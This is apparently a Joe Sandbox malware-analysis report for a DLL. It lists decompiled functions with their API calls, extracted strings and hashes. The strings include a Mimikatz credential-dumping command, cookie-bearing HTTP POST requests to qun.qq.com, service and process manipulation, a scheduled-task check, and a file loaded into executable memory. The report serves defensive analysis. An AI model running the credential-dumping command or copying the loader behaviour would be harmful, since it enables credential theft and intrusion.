                                                          • API ID: Process$Console$Handle$AddressCloseFileFreeListProcSleep$#823#825CreateCurrentDirectoryEventLibraryLoadModuleOpenSystemTerminateWrite
                                                          • String ID: AttachConsole$Control-C^C$GetMP privilege::debug sekurlsa::logonpasswords exit$KERNEL32.dll$WriteFile$\GetMP.exe
                                                          • API String ID: 1461520672-3309419308
                                                          • Opcode ID: cac31e0da7138558aa65d5e754d5fbe1c86959fccf694da2ade540117515b44f
                                                          • Instruction ID: f641c1ed515820e953bbe51d1dd59cc8d6dc84500f78be80370a3875dfa9a0c7
                                                          • Opcode Fuzzy Hash: cac31e0da7138558aa65d5e754d5fbe1c86959fccf694da2ade540117515b44f
                                                          • Instruction Fuzzy Hash: B9A12875600315ABD710EB64DC81FDB77D4FB84390F450629FE49AB280DA35EC49CBA2
                                                          Function 10013860 Relevance: 66.8, APIs: 31, Strings: 7, Instructions: 271networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenA.WININET ref: 100138CF
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 100138F5
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013902
                                                          • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013932
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013945
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013948
                                                          Strings
                                                          • qun.qq.com, xrefs: 10013878
                                                          • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 1001396D
                                                          • , xrefs: 100138BC
                                                          • HTTP/1.1, xrefs: 10013926
                                                          • POST, xrefs: 1001392C
                                                          • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 1001386F
                                                          • /cgi-bin/qun_mgr/search_group_members, xrefs: 10013898
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$Open$ConnectHttpRequest
                                                          • String ID: $/cgi-bin/qun_mgr/search_group_members$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$qun.qq.com
                                                          • API String ID: 3078302290-2376693140
                                                          • Opcode ID: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                          • Instruction ID: ea8ef1183b0b68027489ada680c689866708b7ee025198ed557c1e0327d219cf
                                                          • Opcode Fuzzy Hash: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                          • Instruction Fuzzy Hash: 197119366447147BF310EB689C45FAB77DDFB84720F184629F749A72C0DAB4A9048BA2
                                                          Function 1002C150 Relevance: 64.9, APIs: 12, Strings: 25, Instructions: 154libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1002C1EF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C1F8
                                                          • LoadLibraryA.KERNEL32(wininet.dll,InternetCloseHandle), ref: 1002C226
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C229
                                                          • LoadLibraryA.KERNEL32(wininet.dll,InternetOpenUrlA), ref: 1002C239
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C23C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: $($)$.$/$0$4$CreateFileA$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$KERNEL32.dll$M$WININET.dll$b$c$e$m$o$o$p$t$wininet.dll$z
                                                          • API String ID: 2574300362-3884860928
                                                          • Opcode ID: a0fe883999f5c307d6751ef552034c1abfe4ff28facd08d51dd80d8fd1dad408
                                                          • Instruction ID: 4ff375366c2267cbd01a7d9b0c8cba57e5f193708d52a6dbb985eb268ffd88b8
                                                          • Opcode Fuzzy Hash: a0fe883999f5c307d6751ef552034c1abfe4ff28facd08d51dd80d8fd1dad408
                                                          • Instruction Fuzzy Hash: EB51927110C3C0AEE311EBA89C84B9FBFD99BD5258F844A1DF28457242C679D6088777
                                                          Function 1001DE40 Relevance: 64.9, APIs: 2, Strings: 35, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetVersionExA.KERNEL32(?), ref: 1001DF7B
                                                            • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                            • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                            • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                          • ExitProcess.KERNEL32 ref: 1001E015
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressLoadProc$ExitFreeHandleModuleProcessVersion
                                                          • String ID: .$.$2$2$3$3$D$I$L$P$S$S$S$S$V$a$c$d$d$e$e$e$e$e$i$l$l$l$l$n$r$s$u$v$v
                                                          • API String ID: 1234256494-3470857448
                                                          • Opcode ID: 5efb726bd72b5568478c0eefd72cb04c32db68c14ff699af516f3f2fc0906e0f
                                                          • Instruction ID: da4a0dee0ffee22678b57f4e699674c1860d2bef9f5d6691bc40372a3453092c
                                                          • Opcode Fuzzy Hash: 5efb726bd72b5568478c0eefd72cb04c32db68c14ff699af516f3f2fc0906e0f
                                                          • Instruction Fuzzy Hash: 9C51292140C3C1DDE312D7688898B5BBFE55BA6348F48499EF1C94B282C2BAC65CC777
                                                          Function 1000FED0 Relevance: 63.3, APIs: 33, Strings: 3, Instructions: 251servicesleepprocessCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AttachConsole.KERNEL32(?), ref: 1000FEF3
                                                          • Sleep.KERNEL32(0000000A), ref: 1000FEFB
                                                          • AttachConsole.KERNEL32(?), ref: 1000FF05
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 1000FF18
                                                          • #823.MFC42(00000000), ref: 1000FF29
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1000FF39
                                                          • GetCurrentProcessId.KERNEL32 ref: 1000FF43
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 1000FF57
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000FF66
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000FF6D
                                                          • #825.MFC42(00000000), ref: 1000FF7E
                                                          • FreeConsole.KERNEL32 ref: 1000FF8C
                                                          • Sleep.KERNEL32(0000000A), ref: 1000FF94
                                                          • FreeConsole.KERNEL32 ref: 1000FF9A
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 1000FFA6
                                                          • CloseHandle.KERNEL32(?), ref: 10010006
                                                          • CloseHandle.KERNEL32(?), ref: 1001000E
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001002F
                                                          • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 10010043
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10010050
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010066
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10010077
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001007A
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10010087
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001008A
                                                          • GetCommandLineA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 100100C8
                                                          • CreateProcessA.KERNEL32(00000000,00000000), ref: 100100D1
                                                          • CloseHandle.KERNEL32(?), ref: 100100E4
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 100100FB
                                                          • CreateProcessA.KERNEL32 ref: 1001016C
                                                          • CloseHandle.KERNEL32(?), ref: 1001017F
                                                          • CloseHandle.KERNEL32(?), ref: 10010186
                                                          • ExitProcess.KERNEL32 ref: 1001018A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$Process$Service$Console$Open$AttachCreateFreeListSleepTerminate$#823#825CommandCurrentExitFileLineManagerModuleNameStart
                                                          • String ID: -inst$D$D
                                                          • API String ID: 2444995177-2453324352
                                                          • Opcode ID: bf49bc1a1ae817abcfe63fa2e37f082aed3bfe372cdf28cdc135cb6605de9328
                                                          • Instruction ID: e0cd1fb45156b8efb571fd42663e323a3a5c77c033bea953824193fec0e04bfd
                                                          • Opcode Fuzzy Hash: bf49bc1a1ae817abcfe63fa2e37f082aed3bfe372cdf28cdc135cb6605de9328
                                                          • Instruction Fuzzy Hash: 6381C271600316ABE700DB64CC84B7B77E9FF88790F054A2DFA4997694DB74EC018BA5
                                                          Function 10011AF0 Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #535.MFC42(00000030,00000002,00000000,?,00000000), ref: 10011B2F
                                                          • #540.MFC42 ref: 10011B40
                                                          • #540.MFC42 ref: 10011B4E
                                                          • #6282.MFC42 ref: 10011B69
                                                          • #6283.MFC42 ref: 10011B72
                                                          • #941.MFC42(100FA644), ref: 10011B80
                                                          • #2784.MFC42(100FB4F0,100FA644), ref: 10011B8E
                                                          • #6662.MFC42(00000022,00000001,100FB4F0,100FA644), ref: 10011BB7
                                                          • #4278.MFC42(00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BD6
                                                          • #858.MFC42(00000000,00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BE5
                                                          • #4129.MFC42(?,00000000,100FB4F0,100FA644), ref: 10011C8B
                                                          • #858.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011C98
                                                          • #800.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011CA6
                                                          • #535.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CC2
                                                          • #858.MFC42(00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CFA
                                                          • #858.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D07
                                                          • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D10
                                                          • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D19
                                                          • #5710.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D32
                                                          • #858.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D41
                                                          • #800.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D4F
                                                          • #6282.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D58
                                                          • #2784.MFC42(100FB4F0,00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D66
                                                          • #535.MFC42(?,?,100FB4F0,100FA644), ref: 10011D8D
                                                          • #858.MFC42(00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DC5
                                                          • #858.MFC42(00000022,00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DD2
                                                          • #800.MFC42(100FB4F0,100FA644), ref: 10011DE8
                                                          • #800.MFC42(100FB4F0,100FA644), ref: 10011DF6
                                                          • #800.MFC42(100FB4F0,100FA644), ref: 10011E07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #858$#800$#535$#2614#2784#540#6282$#4129#4278#5710#6283#6662#941
                                                          • String ID: /
                                                          • API String ID: 2746067309-2043925204
                                                          • Opcode ID: 0da93068c975a70c7a6139256a48672d71f2cdb22226152c638404c253ca3162
                                                          • Instruction ID: 26f83c008789524febe6ecc07bb2f6c57f414736253c4046dad23ffb5fd3ab93
                                                          • Opcode Fuzzy Hash: 0da93068c975a70c7a6139256a48672d71f2cdb22226152c638404c253ca3162
                                                          • Instruction Fuzzy Hash: 9F91B175008385AFC344DF64D591EABF7E5EF98214F804A1CF4A657292EB30FA49CB92
                                                          Function 10001700 Relevance: 59.6, APIs: 12, Strings: 22, Instructions: 127libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001717
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001720
                                                          • LoadLibraryA.KERNEL32 ref: 10001792
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001795
                                                          • LoadLibraryA.KERNEL32(user32.dll,GetMessageA), ref: 100017A5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017A8
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer), ref: 100017B6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017B9
                                                          • LoadLibraryA.KERNEL32(USER32.dll,TranslateMessage), ref: 100017C9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017CC
                                                          • LoadLibraryA.KERNEL32(USER32.dll,DispatchMessageA), ref: 100017DC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: DispatchMessageA$F$GetMessageA$KERNEL32.dll$O$S$SetEvent$TranslateMessage$USER32.dll$W$WINMM.dll$a$b$c$g$j$l$n$o$r$user32.dll$waveInAddBuffer
                                                          • API String ID: 2574300362-3155383694
                                                          • Opcode ID: 7e8f983e9651bb8cb031b777cd2917f1a46b555af6ce2a16da49d6b9aa20f874
                                                          • Instruction ID: ccfd42d412a131656b4a3d3b70f2aa919a29a5acdd925cac9141545cb71d5cde
                                                          • Opcode Fuzzy Hash: 7e8f983e9651bb8cb031b777cd2917f1a46b555af6ce2a16da49d6b9aa20f874
                                                          • Instruction Fuzzy Hash: 4341C06050C384AAE310DBB98C48B8BBFD8AFD6758F040A1DF5C497281C679D648CB77
                                                          Function 1001E800 Relevance: 55.7, APIs: 1, Strings: 36, Instructions: 167COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001EA4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$AddressCloseLibraryLoadModuleProc
                                                          • String ID: .$2$3$C$F$F$G$K$L$N$P$R$S$W$a$d$i$i$i$i$i$l$l$l$l$l$n$o$r$r$r$t$t$t$t$z
                                                          • API String ID: 1380958172-3142711299
                                                          • Opcode ID: 89ad62cae8fe24905080a221baf4e047a829f9f57f9a206efcf00e4cc2044355
                                                          • Instruction ID: f97ea8bdc1cbc64613dd2431946c706c1d11176bb2799c527f2df6c6d15d800b
                                                          • Opcode Fuzzy Hash: 89ad62cae8fe24905080a221baf4e047a829f9f57f9a206efcf00e4cc2044355
                                                          • Instruction Fuzzy Hash: 1571252114C3C0DDE342C6A88888B5FFFD55BA6748F48499DF2C85B292D2FA9548C77B
                                                          Function 10020C20 Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 257filesleepmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C4A
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C5D
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C7A
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CA0
                                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(1011FA3C,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CDD
                                                          • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\4.txt,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000001,?,00000000), ref: 10020D06
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D1A
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 10020D35
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000), ref: 10020D51
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D69
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42), ref: 10020D81
                                                          • Sleep.KERNEL32(000007D0,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D8E
                                                          • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DB0
                                                          • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DE3
                                                          • MessageBoxA.USER32(00000000,1011FA00,1011FA10,00000000), ref: 10020E05
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E14
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@$File$#825Virtual$?find@?$basic_string@AllocCloseCreateEos@?$basic_string@FreeGrow@?$basic_string@HandleMessageReadSizeSleep
                                                          • String ID: C:\Users\Public\Documents\MM\4.txt$schtasks /Query /TN MM
                                                          • API String ID: 954268177-2491561334
                                                          • Opcode ID: 5a969736a3d137a320b0cc1ca8b356557b55b2379ab61979d884f25b2f463f53
                                                          • Instruction ID: 372624cc682f9d1b02af3a29d4a48bc895267d3934594f3d044cf31d86844c04
                                                          • Opcode Fuzzy Hash: 5a969736a3d137a320b0cc1ca8b356557b55b2379ab61979d884f25b2f463f53
